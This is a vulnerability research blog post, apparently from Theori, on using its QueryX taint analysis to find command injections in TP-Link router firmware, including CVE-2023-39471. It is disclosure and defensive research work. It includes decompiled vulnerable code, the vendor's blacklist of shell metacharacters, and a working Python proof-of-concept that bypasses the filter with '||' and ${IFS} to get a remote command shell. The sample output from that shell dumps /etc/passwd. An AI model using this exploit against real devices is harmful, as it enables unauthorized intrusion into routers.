Finding Vulnerabilities in Firmware with Static Analysis Platform QueryX
Introduction
Similar security vulnerabilities appear repeatedly for various reasons. That’s why variant analysis, which looks for variations of a known vulnerability, is one of the most common vulnerability detection methods. QueryX is a program analysis platform under active development at Theori that offers automated variant analysis. In this blog post, we will share our experiences while testing the taint analysis module of QueryX and discovering vulnerabilities, including CVE-2023–39471.
Development of Taint Analysis
In November 2022, the QueryX paper was accepted into the 2023 IEEE S&P. It was developed as an internal R&D project to automatically detect security vulnerabilities for binary programs whose source code is not publicly available. It analyzed programs against decompiled code, allowing users to write queries to find vulnerabilities in patterns of their interest. It also provided users with various analysis techniques, including syntactic matching, dataflow analysis, and symbolic analysis. It found 15 new vulnerabilities, including 10 CVEs in the Windows kernel and related binaries, which received a $180,000 bounty.
Since then, we’ve added more analysis techniques, including taint analysis. In short, taint analysis examines the possibility of a value being passed from one point in a program to another. It worked faster than other existing analyzers, which helped us get rid of infeasible alarms and perform a more profound analysis. Our tool is based on abstract interpretation and models the memory state of the program abstractly, allowing us to store taint information. We adopted a modular analysis approach, which analyzes each function only once to generate a reusable function summary and used the stored summaries to compute the program state for each function call. It helped us improve the scalability of the analyzer without sacrificing much accuracy.
Apply to Firmware
We tested our implementation against the firmware of embedded devices. There are several reasons for this. The first one is that embedded firmware is typically closed source, making using traditional source code targeted static analyzers difficult. However, our tool is well suited to this problem because it targets binaries. Also, many firmware are publicly available through vendor homepages, so we can run tests on a large number of them, getting a lot of data and maximizing the benefits of static analysis.
We created queries for injection vulnerabilities such as command injection or SQL injection. Because they are typically caused by user input being passed to dangerous functions, they are ideal for measuring the performance of taint analysis. It is also suited to create queries from known vulnerabilities since such weaknesses are quite often found in embedded devices. We implemented a system to extract large amounts of firmware and run analysis automatically. Then, we ran experiments and evaluated the alarms.
CVE-2022–42433
Before we examine our analysis results, let’s dive into the vulnerability we used to create our query. This query is built from a simple command injection vulnerability found in the TP-Link TL-WR841N, which is assigned CVE-2022–42433.
function is_source(node) {
return function_parameter(node, "recvfrom", 1);
}
function is_sink(node) {
return function_parameter(node, "popen", 0);
}
let alarms = start_taint(is_source, is_sink);
for (let i = 0; i < alarms.length; i++) {
print(alarms[i]);
}
As some of you may have noticed, our query is similar to JavaScript. We implemented an interpreter for JavaScript partly, which also allowed users to use our custom functions. Previous analyzers that followed a similar approach created their own query language, which caused a hurdle at first. We took JavaScript, which is familiar to lots of programmers, as our query language to make a query easy and allow for rich expressions.
In the above query, node
refers to the node of the AST(Abstract Syntax Tree) we are analyzing. function_parameter
is our custom function, which takes a node, a function name, and the index of the argument and returns a boolean value indicating whether the node is an argument to the function call at the index. If we define the source and sink points of the taint analysis with is_source
and is_sink
functions as above and pass them to our custom function start_taint
, the analyzer will run the taint analysis and return the results.
int __fastcall sub_401220(int sock)
{
int v7;
int v17;
const char *str;
char buffer[1464];
...
s = accept(sock, 0, 0);
...
memset(buffer, 0, 1460);
v7 = recvfrom(s, buffer, 1460, 0, 0, 0);
if ( v7 <= 0 )
break;
...
if ( buffer[v7 - 1] != 10 )
goto LABEL_5;
str = strtok_r(buffer, "\r\n", &v17);
while ( str && *str )
{
...
memset(v20, 0, sizeof(v20));
v10 = process_iwpriv_cmd(str, v20, 1450);
...
}
...
}
The vulnerability occurs in the ated_tp
binary, which can be executed via a specific request. The program uses the recvfrom
function to read the input sent by the user over socket communication. Then, split that value by CRLF(\r\n) and pass it to the process_iwpriv_cmd
function.
int __fastcall process_iwpriv_cmd(const char *a1, const char *a2, int a3)
{
int CmdResults;
int cnt;
const char *v9;
int cnt_;
const char *tokens[3];
...
memset(a2, 0, a3);
strncpy(a2, a1, a3 - 1);
cnt = SplitString(a2, tokens, 20, " ");
v9 = tokens[0];
cnt_ = cnt;
if ( strcmp(tokens[0], "iwpriv") || strncmp(tokens[1], "ra", 2) )
{
if ( cnt_ == 3 )
{
CmdResults = -1;
if ( !strcmp(v9, "ifconfig") && !strncmp(tokens[1], "ra", 2) )
CmdResults = getCmdResults(a1, 0, a2, a3);
}
...
}
...
}
The passed value is partitioned by a space character(“ “) via the SplitString
function. This function returns the number of split tokens, and we can see that in order to run the getCmdResults
function, the number of tokens must be three, with the first token being “ifconfig” and the second starting with “ra”.
int __fastcall getCmdResults(const char *a1, int a2, const char *a3, int a4)
{
int v8;
...
v8 = popen(a1, &unk_403178);
...
}
Because the getCmdResults
function is a wrapper function for popen
, if the user has control over the input values, they can put whatever value they want for the third token, leading to a command injection vulnerability.
recvfrom -> process_iwpriv_cmd -> getCmdResults -> popen
The user input was passed through the flow, as shown above. Based on these observations, we can write a taint analysis query that takes the second argument of recvfrom
as the source and the first argument of popen
as the sink.
Result
Our analyzer found three true positives when we ran an experiment based on the above query. They highlighted the main reasons for recurring vulnerabilities and the importance of variant analysis. One of them had the exact same pattern as the vulnerability above but in a different model. Actually, many products from the same manufacturer share lots of code, so a vulnerability found in one product may appear in another. Therefore, when a vulnerability is disclosed, it is important to identify all affected programs and patch them appropriately.
The remaining vulnerabilities were due to incomplete patches. This is another reason that similar patterns of vulnerabilities can recur. It happens when a patch doesn’t properly remove all aspects of a vulnerability but only fixes some of them. Similarly, there are cases where patching a vulnerability may inadvertently introduce a new one, so you should always be cautious and run sufficient tests when creating a patch.
int __fastcall getCmdResults(const char *a1, int a2, const char *a3, int a4)
{
int v9;
...
if ( sub_402720(a1) == 1 )
{
puts("inject cmd match");
return -1;
}
else
{
puts("cmd check ok");
v9 = popen(a1, "r");
...
}
...
}
Let’s take a look at how the manufacturer patched the above vulnerability. They added a routine to validate user input before calling popen
function. The checking function validates that it does not contain dangerous characters using blacklist filtering, which is a common pattern for sanitizing injection vulnerabilities.
004135E4 # "\";" # ";\""
004135EC # "$(" # ")"
004135F4 # ";" # ";"
004135FC # "\n" # "\n"
00413604 # "`" # "`"
0041360C # "&" # "&"
00413614 # "&" # ";"
0041361C # "&" # "\n"
00413624 # ";" # "\n"
0041362C # "$IFS" # "\n"
The function checks if the string pairs above appear in order in the input without being sanitized with quotes. While investigating this alarm, we found that the ‘|’ character was not being checked, which still opened up the flaw.
def connect_socket(ip):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, 5000))
while True:
print('$ ', end='')
command = input().replace(' ', '${IFS}')
if command == 'quit':
break
sock.sendall(f'ifconfig ra|| {command}\n'.encode())
data = sock.recv(1024).split(b'\n')
if data and data[-1] == b'# ':
data = data[:-1]
print(b'\n'.join(data).decode())
if __name__ == '__main__':
ip = sys.argv[1]
print('[+] open ated_tp')
run_ated_tp(ip)
time.sleep(3)
print('[+] connect to target')
connect_socket(ip)
We created a PoC above to verify that the vulnerability does actually occur. The run_ated_tp
function is the code that runs the ated_tp
binary, which we grabbed the code published on the web and modified slightly. The connect_socket
function does the actual communication, and as we saw above, we can only hold three tokens split by a space character, so we handle any spaces by replacing ${IFS}
. Inserting ||
causes a command injection vulnerability, allowing attackers to execute any command they want freely.
❯ ./poc.py 192.168.0.1
[+] open ated_tp
[+] connect to target
$ ls
web
var
usr
sys
sbin
proc
mnt
linuxrc
lib
etc
dev
bin
$ cat /etc/passwd
admin:$1$$iC.dUsGpxNNJGeOm1dFio/:0:0:root:/:/bin/sh
dropbear:x:500:500:dropbear:/var/dropbear:/bin/sh
nobody:*:0:0:nobody:/:/bin/sh
The figure above shows the results of executing the PoC.
004134CC # "\";" # ";\""
004134D4 # "$(" # ")"
004134DC # ";" # ";"
004134E4 # "\n" # "\n"
004134EC # "`" # "`"
004134F4 # "&" # "&"
004134FC # "&" # ";"
00413504 # "&" # "\n"
0041350C # ";" # "\n"
00413514 # "||" # "\n"
0041351C # "|" # "\n"
00413524 # "$IFS" # "\n"
The vulnerability we found was assigned CVE-2023–39471 with a $1100 credit. They have patched it by adding blacklist patterns, as shown above.
Conclusion
So far, we’ve described our journey of testing the taint analysis of QueryX and discovering real-world vulnerabilities. QueryX is not yet publicly available but is currently under development to add and refine various analysis techniques and allow for flexible integration between them. Automatically finding vulnerabilities sounds attractive yet challenging. Our team continuously looks forward to bringing here more good news soon.